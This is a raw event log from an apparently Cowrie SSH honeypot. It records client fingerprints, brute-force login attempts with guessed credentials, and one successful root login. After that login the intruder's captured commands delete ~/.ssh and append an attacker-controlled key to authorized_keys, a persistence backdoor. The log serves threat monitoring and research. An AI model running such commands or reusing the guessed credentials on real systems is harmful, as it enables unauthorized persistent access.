{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T05:18:58.637978Z","src_ip":"80.94.95.112","session":"a8af61695e90"}
{"eventid":"cowrie.login.failed","username":"admin","password":"woodside","message":"login attempt [admin/woodside] failed","sensor":"my-vps","timestamp":"2025-08-31T05:18:58.842962Z","src_ip":"80.94.95.112","session":"a8af61695e90"}
{"eventid":"cowrie.login.failed","username":"admin","password":"woodrow","message":"login attempt [admin/woodrow] failed","sensor":"my-vps","timestamp":"2025-08-31T05:18:59.876208Z","src_ip":"80.94.95.112","session":"a8af61695e90"}
{"eventid":"cowrie.login.failed","username":"admin","password":"witch","message":"login attempt [admin/witch] failed","sensor":"my-vps","timestamp":"2025-08-31T05:19:00.908995Z","src_ip":"80.94.95.112","session":"a8af61695e90"}
{"eventid":"cowrie.login.failed","username":"admin","password":"wayer","message":"login attempt [admin/wayer] failed","sensor":"my-vps","timestamp":"2025-08-31T05:19:01.943376Z","src_ip":"80.94.95.112","session":"a8af61695e90"}
{"eventid":"cowrie.login.failed","username":"admin","password":"waldo1","message":"login attempt [admin/waldo1] failed","sensor":"my-vps","timestamp":"2025-08-31T05:19:02.976528Z","src_ip":"80.94.95.112","session":"a8af61695e90"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:19:03.341747Z","src_ip":"212.227.125.160","session":"ee130ea32a1d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:19:03.344434Z","src_ip":"212.227.125.160","session":"ee130ea32a1d"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:19:04.008891Z","src_ip":"80.94.95.112","session":"a8af61695e90"}
{"eventid":"cowrie.session.closed","duration":"81.3","message":"Connection lost after 81.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:19:11.634929Z","src_ip":"212.227.125.160","session":"88bcd5d25b77"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43784,"dst_ip":"1.2.3.4","dst_port":22,"session":"538c3cdddf8c","protocol":"ssh","message":"New connection: 212.227.235.229:43784 (1.2.3.4:22) [session: 538c3cdddf8c]","sensor":"my-vps","timestamp":"2025-08-31T05:19:12.111311Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:19:12.113911Z","src_ip":"212.227.235.229","session":"538c3cdddf8c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:19:12.386461Z","src_ip":"212.227.235.229","session":"538c3cdddf8c"}
{"eventid":"cowrie.session.connect","src_ip":"79.127.48.196","src_port":52169,"dst_ip":"1.2.3.4","dst_port":22,"session":"c3a50e94f1fc","protocol":"ssh","message":"New connection: 79.127.48.196:52169 (1.2.3.4:22) [session: c3a50e94f1fc]","sensor":"my-vps","timestamp":"2025-08-31T05:19:12.715594Z"}
{"eventid":"cowrie.login.failed","username":"alba","password":"alba","message":"login attempt [alba/alba] failed","sensor":"my-vps","timestamp":"2025-08-31T05:19:13.516706Z","src_ip":"212.227.235.229","session":"538c3cdddf8c"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:19:14.791405Z","src_ip":"212.227.235.229","session":"538c3cdddf8c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58074,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c1516e642a1","protocol":"ssh","message":"New connection: 212.227.235.229:58074 (1.2.3.4:22) [session: 0c1516e642a1]","sensor":"my-vps","timestamp":"2025-08-31T05:19:18.353066Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:19:19.067592Z","src_ip":"212.227.235.229","session":"0c1516e642a1"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:19:19.069301Z","src_ip":"212.227.235.229","session":"0c1516e642a1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36464,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b517908edb7","protocol":"ssh","message":"New connection: 212.227.235.229:36464 (1.2.3.4:22) [session: 2b517908edb7]","sensor":"my-vps","timestamp":"2025-08-31T05:19:22.615631Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:19:22.616479Z","src_ip":"212.227.235.229","session":"2b517908edb7"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T05:19:22.713951Z","src_ip":"212.227.235.229","session":"2b517908edb7"}
{"eventid":"cowrie.login.failed","username":"yarn","password":"yarn","message":"login attempt [yarn/yarn] failed","sensor":"my-vps","timestamp":"2025-08-31T05:19:23.015703Z","src_ip":"212.227.235.229","session":"2b517908edb7"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:19:24.115584Z","src_ip":"212.227.235.229","session":"2b517908edb7"}
{"eventid":"cowrie.login.failed","username":"test","password":"1234567","message":"login attempt [test/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T05:19:24.655508Z","src_ip":"212.227.235.229","session":"0c1516e642a1"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:19:26.706584Z","src_ip":"212.227.235.229","session":"0c1516e642a1"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:19:27.139683Z","src_ip":"79.127.48.196","session":"c3a50e94f1fc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:19:27.140387Z","src_ip":"79.127.48.196","session":"c3a50e94f1fc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58966,"dst_ip":"1.2.3.4","dst_port":22,"session":"c937ae2f9168","protocol":"ssh","message":"New connection: 212.227.235.229:58966 (1.2.3.4:22) [session: c937ae2f9168]","sensor":"my-vps","timestamp":"2025-08-31T05:19:27.523073Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49904,"dst_ip":"1.2.3.4","dst_port":22,"session":"5077d4abc456","protocol":"ssh","message":"New connection: 212.227.235.229:49904 (1.2.3.4:22) [session: 5077d4abc456]","sensor":"my-vps","timestamp":"2025-08-31T05:19:29.299403Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:19:29.300441Z","src_ip":"212.227.235.229","session":"5077d4abc456"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:19:29.382494Z","src_ip":"212.227.235.229","session":"5077d4abc456"}
{"eventid":"cowrie.login.success","username":"root","password":"syhhidc","message":"login attempt [root/syhhidc] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:19:29.711658Z","src_ip":"212.227.235.229","session":"5077d4abc456"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:19:29.897686Z","src_ip":"212.227.235.229","session":"5077d4abc456"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:19:29.898412Z","src_ip":"212.227.235.229","session":"5077d4abc456"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:19:29.899337Z","src_ip":"212.227.235.229","session":"5077d4abc456"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:19:29.983557Z","src_ip":"212.227.235.229","session":"5077d4abc456"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:19:30.210863Z","src_ip":"212.227.235.229","session":"5077d4abc456"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:19:30.211606Z","src_ip":"212.227.235.229","session":"5077d4abc456"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:19:30.296617Z","src_ip":"212.227.235.229","session":"5077d4abc456"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:19:30.297789Z","src_ip":"212.227.235.229","session":"5077d4abc456"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49920,"dst_ip":"1.2.3.4","dst_port":22,"session":"37f6507a5dd6","protocol":"ssh","message":"New connection: 212.227.235.229:49920 (1.2.3.4:22) [session: 37f6507a5dd6]","sensor":"my-vps","timestamp":"2025-08-31T05:19:30.378048Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:19:30.379034Z","src_ip":"212.227.235.229","session":"37f6507a5dd6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:19:30.460769Z","src_ip":"212.227.235.229","session":"37f6507a5dd6"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:19:30.829233Z","src_ip":"212.227.235.229","session":"37f6507a5dd6"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:19:31.913895Z","src_ip":"212.227.235.229","session":"37f6507a5dd6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49934,"dst_ip":"1.2.3.4","dst_port":22,"session":"606af24e9da0","protocol":"ssh","message":"New connection: 212.227.235.229:49934 (1.2.3.4:22) [session: 606af24e9da0]","sensor":"my-vps","timestamp":"2025-08-31T05:19:31.995462Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:19:31.996285Z","src_ip":"212.227.235.229","session":"606af24e9da0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:19:32.078119Z","src_ip":"212.227.235.229","session":"606af24e9da0"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"1qaz@WSX","message":"login attempt [oracle/1qaz@WSX] failed","sensor":"my-vps","timestamp":"2025-08-31T05:19:32.395747Z","src_ip":"212.227.235.229","session":"922d0835187b"}
